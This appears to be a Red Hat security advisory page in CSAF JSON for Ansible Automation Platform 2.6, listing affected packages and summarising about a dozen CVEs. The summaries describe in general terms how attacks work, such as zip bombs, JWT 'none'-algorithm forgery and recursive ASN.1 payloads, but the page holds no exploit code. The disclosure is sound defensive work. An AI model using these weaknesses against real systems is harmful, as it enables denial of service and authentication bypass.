"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "svgo: SVGO: Denial of Service via XML entity expansion"
}
]
}
RHSA-2026:6404
Vulnerability from csaf_redhat - Published: 2026-04-01 18:20 - Updated: 2026-04-16 10:45A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.
A flaw was found in express-rate-limit. The default key generator incorrectly applies IPv6 subnet masking to IPv4-mapped IPv6 addresses, which are used when an IPv4 client connects to a dual-stack server. This misconfiguration causes all IPv4 traffic to be treated as a single entity for rate limiting. Consequently, a remote attacker can exhaust the rate limit with a single client, leading to a Denial of Service (DoS) for all other IPv4 clients by causing them to receive HTTP 429 errors.
An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6404",
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69223",
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28498",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30827",
"url": "https://access.redhat.com/security/cve/CVE-2026-30827"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30922",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6404.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Container Release Update",
"tracking": {
"current_release_date": "2026-04-16T10:45:25+00:00",
"generator": {
"date": "2026-04-16T10:45:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6404",
"initial_release_date": "2026-04-01T18:20:27+00:00",
"revision_history": [
{
"date": "2026-04-01T18:20:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-01T18:20:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:45:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
